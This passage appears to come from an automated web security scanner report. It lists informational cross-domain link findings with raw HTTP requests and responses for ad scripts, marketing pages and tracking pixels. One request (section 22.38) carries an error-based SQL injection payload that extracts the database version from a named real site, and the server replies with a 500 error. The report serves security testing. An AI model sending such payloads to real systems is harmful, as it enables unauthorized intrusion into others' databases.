Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 25 Apr 2011 14:35:59 GMT
Server: Microsoft-IIS/6.0
Connection: Close
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: dv=4/25/2011 6:35:59 PM; expires=Sun, 25-Apr-2021 14:35:59 GMT; path=/
Set-Cookie: Query=/products/ims/index.html?utm_source=dir&utm_medium=cpc&utm_campaign=d1010_mail1&utm_term=mail_ics2&utm_content=10013; expires=Sun, 25-Apr-2021 14:35:59 GMT; path=/
Set-Cookie: FirstVisit=4/25/2011 6:35:59 PM; expires=Sun, 25-Apr-2021 14:35:59 GMT; path=/
Set-Cookie: ASP.NET_SessionId=fkdyl055c3sg0uuma045oy45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=windows-1251
Content-Length: 21815

<html><!-- #BeginTemplate "/Templates/main.dwt" --><!-- DW6 -->
<head>
<script type="text/javascript" src="/dropmenu/jquery.js" />
</script>
<script type="text/javascript" src="/dropmenu/hmenu.js"
...[SNIP]...
<div>
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="611" height="167" wmode="opaque">
        <param name="wmode" value="opaque" />
...[SNIP]...
<div class="name">
<a
href="http://www.ideco-software.ru/products/onlineseminar08_nsd_20110421.html?fr=ban_sem20110419">
................. ...... Ideco ICS ... ...... ............ ......</a>
...[SNIP]...
</script>
<script src="http://bs.yandex.ru/resource/watch.js" type="text/javascript"></script>
<noscript>
<img src="http://bs.yandex.ru/watch/35648" border="0" width="1" height="1" alt="">
</noscript>
...[SNIP]...

22.32. http://js.dt00.net/public/smi/elastic/24.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://js.dt00.net
Path:   /public/smi/elastic/24.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /public/smi/elastic/24.js?time=13 HTTP/1.1
Host: js.dt00.net
Proxy-Connection: keep-alive
Referer: http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:40:23 GMT
Content-Type: application/x-javascript
Content-Length: 12170
Last-Modified: Mon, 25 Apr 2011 14:30:01 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Wed, 25 May 2011 14:40:23 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes

var mginformer = '<div class="box"> <ul class="smi-inf" id = "smi-informer"> <li> <a href="http://mgpublications.com/news/37575" target="_blank" class="smi-inf-img"><img width="75" height="75" src="http://smiimg.dt00.net/smi/2011/04/2011042420080728-135026-5951-75x75.jpg">
...[SNIP]...
<div class="smi-inf-box"> <a href="http://mgpublications.com/news/37575" target="_blank">.................., .................... .... .... ............ .. ..........!</a>
...[SNIP]...
<li> <a href="http://mgpublications.com/news/37570" target="_blank" class="smi-inf-img"><img width="75" height="75" src="http://smiimg.dt00.net/smi/2011/04/20110424880_news_223201-75x75.jpg">
...[SNIP]...
<div class="smi-inf-box"> <a href="http://mgpublications.com/news/37570" target="_blank">........ .................. .............. .. ...................... .................... (........)</a>
...[SNIP]...
<li> <a href="http://mgpublications.com/news/37564" target="_blank" class="smi-inf-img"><img width="75" height="75" src="http://smiimg.dt00.net/smi/2011/04/201104241584-75x75.jpg">
...[SNIP]...
<div class="smi-inf-box"> <a href="http://mgpublications.com/news/37564" target="_blank">............ ......................, ...... ...... ....................! </a>
...[SNIP]...
<li> <a href="http://mgpublications.com/news/36534" target="_blank" class="smi-inf-img"><img width="75" height="75" src="http://smiimg.dt00.net/smi/2011/03/20110328vanga-15022011-75x75.jpg">
...[SNIP]...
<div class="smi-inf-box"> <a href="http://mgpublications.com/news/36534" target="_blank">.......... ............ ................ ............ .... ........................ ..........?</a>
...[SNIP]...
<li> <a href="http://mgpublications.com/news/37192" target="_blank" class="smi-inf-img"><img width="75" height="75" src="http://smiimg.dt00.net/smi/2011/04/20110414126306301-75x75.jpg">
...[SNIP]...
<div class="smi-inf-box"> <a href="http://mgpublications.com/news/37192" target="_blank">............ .............. .... ........ ............ .................... .......................... ............</a>
...[SNIP]...
<li> <a href="http://mgpublications.com/news/26738" target="_blank" class="smi-inf-img"><img width="75" height="75" src="http://smiimg.dt00.net/smi/2010/10/20101024lolita-370-10-11-75x75.jpg">
...[SNIP]...
<div class="smi-inf-box"> <a href="http://mgpublications.com/news/26738" target="_blank">............ ................ .................. ............ .. .......... ............</a>
...[SNIP]...
<li> <a href="http://mgpublications.com/news/30309" target="_blank" class="smi-inf-img"><img width="75" height="75" src="http://smiimg.dt00.net/smi/2010/12/20101218702558_3-75x75.jpg">
...[SNIP]...
<div class="smi-inf-box"> <a href="http://mgpublications.com/news/30309" target="_blank">...... ...... .................... ........ ........ .................. (........)</a>
...[SNIP]...
<li> <a href="http://mgpublications.com/news/4654" target="_blank" class="smi-inf-img"><img width="75" height="75" src="http://imgn.dt00.net/320/320425_b.jpg">
...[SNIP]...
<div class="smi-inf-box"> <a href="http://mgpublications.com/news/4654" target="_blank">........-............ ...... VIP-........... ...... .......... .............. ........ ........ ................ ....................... </a>
...[SNIP]...
<li> <a href="http://mgpublications.com/news/2192" target="_blank" class="smi-inf-img"><img width="75" height="75" src="http://imgn.dt00.net/200/200462_b.jpg">
...[SNIP]...
<div class="smi-inf-box"> <a href="http://mgpublications.com/news/2192" target="_blank">.................... .......... ................ ........: .......... .............................. ...... ........ .. ...................... ........!</a>
...[SNIP]...
<li> <a href="http://mgpublications.com/news/20803" target="_blank" class="smi-inf-img"><img width="75" height="75" src="http://smiimg.dt00.net/smi/2010/07/2010073024-75x75.jpg">
...[SNIP]...
<div class="smi-inf-box"> <a href="http://mgpublications.com/news/20803" target="_blank">........................ ................ ................ ................ .......... .............. .. ........ .......... (........)</a>
...[SNIP]...
<li> <a href="http://mgpublications.com/news/31765" target="_blank" class="smi-inf-img"><img width="75" height="75" src="http://smiimg.dt00.net/smi/2011/01/20110112mini-75x75.jpg">
...[SNIP]...
<div class="smi-inf-box"> <a href="http://mgpublications.com/news/31765" target="_blank">................ .... .............. ................!</a>
...[SNIP]...
<li> <a href="http://mgpublications.com/news/4489" target="_blank" class="smi-inf-img"><img width="75" height="75" src="http://imgn.dt00.net/288/288120_b.jpg">
...[SNIP]...
<div class="smi-inf-box"> <a href="http://mgpublications.com/news/4489" target="_blank">...................... .............. ...................... (..........)</a>
...[SNIP]...
<li> <a href="http://mgpublications.com/news/2543" target="_blank" class="smi-inf-img"><img width="75" height="75" src="http://imgn.dt00.net/171/171296_b.jpg">
...[SNIP]...
<div class="smi-inf-box"> <a href="http://mgpublications.com/news/2543" target="_blank">.............. ................ ................ .. ............ (..........)</a>
...[SNIP]...
<li> <a href="http://mgpublications.com/news/36653" target="_blank" class="smi-inf-img"><img width="75" height="75" src="http://smiimg.dt00.net/smi/2011/04/20110401961-75x75.jpg">
...[SNIP]...
<div class="smi-inf-box"> <a href="http://mgpublications.com/news/36653" target="_blank">............ ................: .. .......... ...................... ..................!</a>
...[SNIP]...
<li> <a href="http://mgpublications.com/news/19679" target="_blank" class="smi-inf-img"><img width="75" height="75" src="http://smiimg.dt00.net/smi/2010/07/2010070147311636_1249839344_1236164273_i10paradoxatlantidaf10_640-75x75.jpg">
...[SNIP]...
<div class="smi-inf-box"> <a href="http://mgpublications.com/news/19679" target="_blank">........................ ................: .................. ...................... .... ......</a>
...[SNIP]...
<li> <a href="http://mgpublications.com/news/36386" target="_blank" class="smi-inf-img"><img width="75" height="75" src="http://smiimg.dt00.net/smi/2011/03/2011032520101209chris43-75x75.jpg">
...[SNIP]...
<div class="smi-inf-box"> <a href="http://mgpublications.com/news/36386" target="_blank">................ .............. .................. .. ........................ ........</a>
...[SNIP]...
<li> <a href="http://mgpublications.com/news/26548" target="_blank" class="smi-inf-img"><img width="75" height="75" src="http://smiimg.dt00.net/smi/2010/10/20101021131-75x75.jpg">
...[SNIP]...
<div class="smi-inf-box"> <a href="http://mgpublications.com/news/26548" target="_blank">...... ............ ...... ............? ...... .................. ............ .......... .............. (........)</a>
...[SNIP]...
<li> <a href="http://mgpublications.com/news/1731" target="_blank" class="smi-inf-img"><img width="75" height="75" src="http://imgn.dt00.net/57/57823_b.jpg">
...[SNIP]...
<div class="smi-inf-box"> <a href="http://mgpublications.com/news/1731" target="_blank">.............. .................. ...... .... .......................... (........)</a>
...[SNIP]...
<li> <a href="http://mgpublications.com/news/34328" target="_blank" class="smi-inf-img"><img width="75" height="75" src="http://smiimg.dt00.net/smi/2011/02/20110220368895_11-75x75.jpg">
...[SNIP]...
<div class="smi-inf-box"> <a href="http://mgpublications.com/news/34328" target="_blank">.............. .............., .............. ........ 2600 ...... .......... (........)</a>
...[SNIP]...
<li> <a href="http://mgpublications.com/news/36661" target="_blank" class="smi-inf-img"><img width="75" height="75" src="http://smiimg.dt00.net/smi/2011/04/20110401gallery3_b2f375e8de5fa9f50d040546ed2ab9b41-75x75.jpg">
...[SNIP]...
<div class="smi-inf-box"> <a href="http://mgpublications.com/news/36661" target="_blank">............ .............., ................ .... .............. ............ (........)</a>
...[SNIP]...
<li> <a href="http://mgpublications.com/news/37143" target="_blank" class="smi-inf-img"><img width="75" height="75" src="http://smiimg.dt00.net/smi/2011/04/20110414khlopin-75x75.jpg">
...[SNIP]...
<div class="smi-inf-box"> <a href="http://mgpublications.com/news/37143" target="_blank">.................. ............ ...., ...... 150 ...... .... .......... .............. ............</a>
...[SNIP]...
<li> <a href="http://mgpublications.com/news/34333" target="_blank" class="smi-inf-img"><img width="75" height="75" src="http://smiimg.dt00.net/smi/2011/02/20110220371001_1-75x75.jpg">
...[SNIP]...
<div class="smi-inf-box"> <a href="http://mgpublications.com/news/34333" target="_blank">........ .......... .............. .............. .......... (........)</a>
...[SNIP]...
<li> <a href="http://mgpublications.com/news/6218" target="_blank" class="smi-inf-img"><img width="75" height="75" src="http://imgn.dt00.net/344/344198_b.jpg">
...[SNIP]...
<div class="smi-inf-box"> <a href="http://mgpublications.com/news/6218" target="_blank">................ .......... ................ ..................!</a>
...[SNIP]...
<li> <a href="http://mgpublications.com/news/29388" target="_blank" class="smi-inf-img"><img width="75" height="75" src="http://smiimg.dt00.net/smi/2010/12/20101201mini_video-alena-berezovskaja-ja-s-zhenoj-prezidenta-89cc-75x75.jpg">
...[SNIP]...
<div class="smi-inf-box"> <a href="http://mgpublications.com/news/29388" target="_blank">............ ...... .................. "................" .................. ........ (........)</a>
...[SNIP]...

22.33. http://jsc.dt00.net/w/e/webalta.ru.1001.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jsc.dt00.net
Path:   /w/e/webalta.ru.1001.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /w/e/webalta.ru.1001.js?t=1113259 HTTP/1.1
Host: jsc.dt00.net
Proxy-Connection: keep-alive
Referer: http://webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:20:09 GMT
Content-Type: application/x-javascript
Content-Length: 10274
Last-Modified: Fri, 14 Jan 2011 22:38:43 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Wed, 25 May 2011 14:20:09 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes

/*marketgid.comV2.1*/var MGDQ1001 = document.getElementById('MarketGidComposite1001'); function MGD011001(MGD02){ if (!document.cookie){ switch (MGD02) { case 'MG_type': case 'MG_id': return null; bre
...[SNIP]...
<div class="mcimage7269"><a target="_blank" href="http://www.marketgid.com/pnews/'+id+'/i/7269/pp/'+MGD001001+'/'+MGDZ1001+'/#k1001" ><img class="mcimage7269" width="75" height="75" src="http://imgn.dt00.net/'+Math.floor(id/1000)+'/'+id+'_m'+ext+'" />
...[SNIP]...
<div class="mctitle7269"><a target="_blank" href="http://www.marketgid.com/pnews/'+id+'/i/7269/pp/'+MGD001001+'/'+MGDZ1001+'/#k1001" class="mctitle7269">'+title+'</a>
...[SNIP]...
<div class="mcimage5925"><a target="_blank" href="http://www.marketgid.com/ghits/'+n[1]+'/i/5925/pp/'+MGD001001+'/'+MGDZ1001+'/k/'+n[6]+'#k1001" ><img class="mcimage5925" width="75" height="75"src="http://imgg.dt00.net/'+Math.floor(n[1]/1000)+'/'+n[1]+'_m'+(n[2]==2?'.gif':'.jpg')+'" />
...[SNIP]...
<div class="mctitle5925"><a target="_blank" href="http://www.marketgid.com/ghits/'+n[1]+'/i/5925/pp/'+MGD001001+'/'+MGDZ1001+'/k/'+n[6]+'#k1001" class="mctitle5925">'+MGD065925(n[3])+'</a>
...[SNIP]...

22.34. http://jsc.dt00.net/w/e/webalta.ru.1668.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jsc.dt00.net
Path:   /w/e/webalta.ru.1668.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /w/e/webalta.ru.1668.js?t=1113259 HTTP/1.1
Host: jsc.dt00.net
Proxy-Connection: keep-alive
Referer: http://auto.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:20:13 GMT
Content-Type: application/x-javascript
Content-Length: 10491
Last-Modified: Tue, 28 Dec 2010 09:23:54 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Wed, 25 May 2011 14:20:13 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes

/*marketgid.comV2.1*/var MGDQ1668 = document.getElementById('MarketGidComposite1668'); function MGD011668(MGD02){ if (!document.cookie){ switch (MGD02) { case 'MG_type': case 'MG_id': return null; bre
...[SNIP]...
<div class="mcimage8504"><a target="_blank" href="http://www.marketgid.com/pnews/'+id+'/i/8504/pp/'+MGD001668+'/'+MGDZ1668+'/#k1668" ><img class="mcimage8504" width="100" height="75" src="http://imgn.dt00.net/'+Math.floor(id/1000)+'/'+id+'_t100'+ext+'" />
...[SNIP]...
<div class="mctitle8504"><a target="_blank" href="http://www.marketgid.com/pnews/'+id+'/i/8504/pp/'+MGD001668+'/'+MGDZ1668+'/#k1668" class="mctitle8504">'+title+'</a>
...[SNIP]...
<div class="mcimage6906"><a target="_blank" href="http://www.marketgid.com/ghits/'+n[1]+'/i/6906/pp/'+MGD001668+'/'+MGDZ1668+'/k/'+n[6]+'#k1668" ><img class="mcimage6906" width="100" height="75"src="http://imgg.dt00.net/'+Math.floor(n[1]/1000)+'/'+n[1]+'_t100'+(n[2]==2?'.gif':'.jpg')+'" />
...[SNIP]...
<div class="mctitle6906"><a target="_blank" href="http://www.marketgid.com/ghits/'+n[1]+'/i/6906/pp/'+MGD001668+'/'+MGDZ1668+'/k/'+n[6]+'#k1668" class="mctitle6906">'+MGD066906(n[3])+'</a>
...[SNIP]...

22.35. http://jsg.dt00.net/m/a/marketgid.com.i5.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jsg.dt00.net
Path:   /m/a/marketgid.com.i5.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /m/a/marketgid.com.i5.js?t=1113 HTTP/1.1
Host: jsg.dt00.net
Proxy-Connection: keep-alive
Referer: http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:37:23 GMT
Content-Type: application/x-javascript
Content-Length: 4586
Last-Modified: Mon, 21 Mar 2011 23:11:33 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Wed, 25 May 2011 14:37:23 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes

/*marketgid.comV7.9*/ function MGD01310(MGD02){ if (!document.cookie){ document.cookie="MG_310=1;path=/"; if (!document.cookie){ var MGDA=new Date(); return (MGDA.getSeconds()%20+1); } else return 1-1
...[SNIP]...
<div class="hit"> <a target="_blank" href="http://www.marketgid.com/ghits/'+n[1]+'/i/310/pp/'+MGD00+'/'+MGDZ+'/k/'+n[6]+'" class="desc">'+MGD07310(n[4])+'</a> <a target="_blank" href="http://www.marketgid.com/ghits/'+n[1]+'/i/310/pp/'+MGD00+'/'+MGDZ+'/k/'+n[6]+'" class="img"><img width="200" height="200"src="http://imgg.dt00.net/'+Math.floor(n[1]/1000)+'/'+n[1]+'_vb'+(n[2]==2?'.gif':'.jpg')+'" /></a> <a target="_blank" href="http://www.marketgid.com/ghits/'+n[1]+'/i/310/pp/'+MGD00+'/'+MGDZ+'/k/'+n[6]+'" class="title">'+MGD06310(n[3])+'</a> <a target="_blank" href="http://www.marketgid.com/ghits/'+n[1]+'/i/310/pp/'+MGD00+'/'+MGDZ+'/k/'+n[6]+'" class="price">'+n[7]+'</a>
...[SNIP]...

22.36. http://jsg.dt00.net/m/a/marketgid.com.i59.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jsg.dt00.net
Path:   /m/a/marketgid.com.i59.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /m/a/marketgid.com.i59.js?t=1113 HTTP/1.1
Host: jsg.dt00.net
Proxy-Connection: keep-alive
Referer: http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:36:22 GMT
Content-Type: application/x-javascript
Content-Length: 4658
Last-Modified: Mon, 21 Mar 2011 23:12:01 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Wed, 25 May 2011 14:36:22 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes

/*marketgid.comV7.9*/ function MGD011063(MGD02){ if (!document.cookie){ document.cookie="MG_1063=1;path=/"; if (!document.cookie){ var MGDA=new Date(); return (MGDA.getSeconds()%20+1); } else return 0
...[SNIP]...
<div class="hit"> <a target="_blank" href="http://www.marketgid.com/ghits/'+n[1]+'/i/1063/pp/'+MGD00+'/'+MGDZ+'/k/'+n[6]+'" class="desc">'+MGD071063(n[4])+'</a> <a target="_blank" href="http://www.marketgid.com/ghits/'+n[1]+'/i/1063/pp/'+MGD00+'/'+MGDZ+'/k/'+n[6]+'" class="img"><img width="200" height="200"src="http://imgg.dt00.net/'+Math.floor(n[1]/1000)+'/'+n[1]+'_vb'+(n[2]==2?'.gif':'.jpg')+'" /></a> <a target="_blank" href="http://www.marketgid.com/ghits/'+n[1]+'/i/1063/pp/'+MGD00+'/'+MGDZ+'/k/'+n[6]+'" class="title">'+MGD061063(n[3])+'</a> <a target="_blank" href="http://www.marketgid.com/ghits/'+n[1]+'/i/1063/pp/'+MGD00+'/'+MGDZ+'/k/'+n[6]+'" class="price">'+n[7]+'</a>
...[SNIP]...

22.37. http://learn.shavlik.com/shavlik/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://learn.shavlik.com
Path:   /shavlik/index.cfm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /shavlik/index.cfm?pg=374 HTTP/1.1
Host: learn.shavlik.com
Proxy-Connection: keep-alive
Referer: http://learn.shavlik.com/shavlik/index.cfm?m=1112&pg=697&h=0&hp=697&utm_term=vulnerability%20management&utm_campaign=PatchManagement&utm_mt=e&gclid=CPC_jKTPt6gCFUh-5QodsROzEA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=799534; CFTOKEN=57697702; __utmz=225610631.1303732848.1.1.utmgclid=CPC_jKTPt6gCFUh-5QodsROzEA|utmccn=PatchManagement|utmcmd=(not%20set)|utmctr=vulnerability%20management; __utma=225610631.313706594.1303732848.1303732848.1303732848.1; __utmc=225610631; __utmb=225610631.2.10.1303732848

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 25 Apr 2011 12:16:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


                                                   
...[SNIP]...
<body>
<img src="http://www.burstnet.com/enlightn/7214//98DD/" width="0" height="0" border="0"><!--- Remarketing Tracking pixel --->
...[SNIP]...

22.38. http://learn.shavlik.com/shavlik/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://learn.shavlik.com
Path:   /shavlik/index.cfm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /shavlik/index.cfm?m=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2C(SELECT%20@@VERSION)%2CCHAR(95)%2CCHAR(33)%2CCHAR(64))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))&pg=697&h=0&hp=697&utm_term=vulnerability%20management&utm_campaign=PatchManagement&utm_mt=e&gclid=CPC_jKTPt6gCFUh-5QodsROzEA HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: learn.shavlik.com
Cookie: CFID=799689; CFTOKEN=67476078
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 25 Apr 2011 12:26:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8


                                                                                           
...[SNIP]...
<li>Check the <a href='http://www.macromedia.com/go/proddoc_getdoc' target="new">ColdFusion documentation</a>
...[SNIP]...
<li>Search the <a href='http://www.macromedia.com/support/coldfusion/' target="new">Knowledge Base</a>
...[SNIP]...

22.39. http://limg.imgsmail.ru/r/js/splash.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://limg.imgsmail.ru
Path:   /r/js/splash.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /r/js/splash.js?7 HTTP/1.1
Host: limg.imgsmail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 25 Apr 2011 14:25:16 GMT
Content-Type: application/x-javascript
Last-Modified: Thu, 20 Jan 2011 13:37:56 GMT
Connection: keep-alive
Expires: Mon, 02 May 2011 14:25:16 GMT
Cache-Control: max-age=604800
Content-Length: 141559

/*
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-02-
...[SNIP]...
);
       tbody = createElement("tbody");
       while (item = res[i++]) {
           (function(str){
               if (j && !str && item.site) {
                   item.site = item.site.replace(/^http:\/\//,'').replace(/\/$/,'');
                   str = '<a onclick="return false;" href="http://go.mail.ru/search?q='+item.site+'&ce=1" title="....... .. '+item.site+'">'+item.site+'</a>
...[SNIP]...

22.40. http://nguard.com/vulnerability-assessment/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nguard.com
Path:   /vulnerability-assessment/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /vulnerability-assessment/?gclid=CM2C9p3Pt6gCFUOo4AoduRviBQ HTTP/1.1
Host: nguard.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=74935565.1303732835.1.1.utmgclid=CM2C9p3Pt6gCFUOo4AoduRviBQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=74935565.1810353086.1303732835.1303732835.1303732835.1; __utmc=74935565

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:52:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 19622


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

22.41. http://pixel.fetchback.com/serve/fb/pdc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /serve/fb/pdc

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /serve/fb/pdc?cat=&name=landing&sid=719 HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/page_not_found.shtml
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1303742441_10164:0_10638:0_10640:0_10641:0_1437:0_1660:562769; uid=1_1303742441_1303179323923:6792170478871670; kwd=1_1303742441_11317:0_11717:0_11718:0_11719:0; sit=1_1303742441_719:0:0_2451:50869:45769_3236:208832:208714_782:563118:562769; cre=1_1303742441; bpd=1_1303742441; apd=1_1303742441; scg=1_1303742441; ppd=1_1303742441; afl=1_1303742441

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:41:11 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cmp=1_1303742471_10164:0_10638:0_10640:0_10641:0_1437:0_1660:562799; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: uid=1_1303742471_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: kwd=1_1303742471_11317:0_11717:0_11718:0_11719:0; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: sit=1_1303742471_719:30:0_2451:50899:45799_3236:208862:208744_782:563148:562799; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: cre=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: bpd=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: apd=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
